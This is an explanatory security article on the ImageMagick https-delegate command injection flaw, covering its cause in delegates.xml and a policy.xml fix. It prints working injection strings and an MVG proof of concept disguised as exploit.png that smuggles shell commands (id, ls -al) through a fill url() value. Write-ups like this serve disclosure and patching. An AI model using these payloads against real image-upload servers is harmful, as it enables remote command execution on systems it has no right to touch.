An in-depth analysis of ImageMagick command execution vulnerabilities

00 Foreword

What is ImageMagick?

ImageMagick is a powerful open source graphics processing software that can be used to read, write and process more than 90 kinds of image files, including popular JPEG, GIF, PNG, PDF and PhotoCD formats. Use it to process pictures with various special effects such as cutting, rotating, and combining them.

Due to its powerful functions, good performance, and extended support for many languages, it is widely used in program development. Many website developers like to use ImageMagick extensions to do image processing work on the web, such as user avatar generation, image editing, etc.

01 Vulnerability Description

ImageMagick is an open source image processing library that supports multiple languages ​​such as PHP, Ruby, NodeJS and Python, and is widely used. Several image processing plug-ins, including PHP imagick, Ruby rmagick and paperclip, and NodeJS imagemagick, all rely on it to run. When an attacker constructs an image containing malicious code, the ImageMagick library improperly handles HTTPPS files and does not perform any filtering. It can remotely execute remote commands and possibly control the server.

02 Impact

Attack cost: low

Hazard level: High

Affected scope: All versions before ImageMagick 6.9.3-9

03 Vulnerability Analysis

The command execution vulnerability occurs in the process of ImageMagick processing files in https format.

The reason why ImageMagick supports so many file formats is because it has a lot of built-in image processing libraries. For these image processing libraries, ImageMagick named it "Delegate" (delegate), and each Delegate corresponds to one format file, and then call the external lib for processing through the system's system() command. The process of calling external lib is executed using the system's system command, resulting in the code executing the command.

Default configuration file for ImageMagick delegates: /etc/ImageMagick/delegates.xml

For specific code, please refer to: Github-ImageMagick

We locate the https delegation line:

" <delegate decode=\"https\" command=\""wget" -q -O "%o" "https:%M"\"/>"

As you can see, command defines the command that is brought into the system() function when processing https files: "wget" -q -O "%o" "https:%M".

wget is a command to download files from the network, %M is a placeholder, it must be specifically defined in the configuration file as follows:

%i input image filename
%o output image filename
%u unique temporary filename
%Z unique temporary filename
%# input image signature
%b image file size
%c input image comment
%g image geometry
%h image rows (height)
%k input image number colors
%l image label
%m input image format
%p page number
%q input image depth
%s scene number
%w image columns (width)
%x input image x resolution
%y input image y resolution

You can see that %m is defined as the input image format, which is the url address we entered. However, since we only did simple string splicing without any filtering and directly spliced ​​it into the command command, we can close the quotation marks and bring them into other commands through "|", "`", "&", etc., that is Command injection is formed.

For example, we pass in the following code:

https://test.com"|ls “-al

Then the actual command executed by the system function is:

“wget” -q -O “%o” “ https://test.com"|ls “-al”

In this way, the ls -al command is successfully executed.

04 Exploit

The POC of this vulnerability was given by a foreigner, as follows:

push graphic-context
viewbox 0 0 640 480
fill 'url(https://"|id; ")'
pop graphic-context

push and pop are used for stack operations, one is pushed into the stack and the other is popped out of the stack;

Viewbox represents the size of the visible area of ​​SVG, or it can be imagined as the stage size or canvas size. The simple understanding is to select a part of the screen according to the following parameters;

fill url() fills the image into the current element;

In it, we use fill url() to call the vulnerable https delegate. When ImageMagick processes this file, the vulnerability will be triggered.

Attachment: ImageMagick supports an image format by default, called mvg, and mvg is similar to the svg format, in which the content of the vector image is written in text form, allowing other delegates in ImageMagick to be loaded (such as the vulnerable https delegate) . And during the graphics processing process, ImageMagick will automatically process it according to its content, which means that we can arbitrarily define the file as png, jpg and other formats allowed for website upload, which greatly increases the exploitable scenarios of the vulnerability.

Usage process:

Create an exploit.png file with the following content:

push graphic-context
viewbox 0 0 640 480
fill 'url(https://test.com/image.jpg"|ls "-al)'
pop graphic-context

Execute command: convert exploit.png 1.png (the following are the parameters of convert)

05 bug fix

Upgrade to the latest version

Configure /etc/ImageMagick/policy.xml to disable https, mvg delegates, or delete the corresponding delegates directly in the configuration file

<policymap>
<policy domain="coder" rights="none" pattern="EPHEMERAL" />
<policy domain="coder" rights="none" pattern="URL" />
<policy domain="coder" rights="none" pattern="HTTPS" />
<policy domain="coder" rights="none" pattern="MVG" />
<policy domain="coder" rights="none" pattern="MSL" />
</policymap>

The above is the knowledge about ImageMagick command execution vulnerabilities introduced by the editor. I hope it will be helpful to you. If you have any questions, please leave me a message and the editor will reply to you in time. I would also like to thank you all for your support of the Script House website!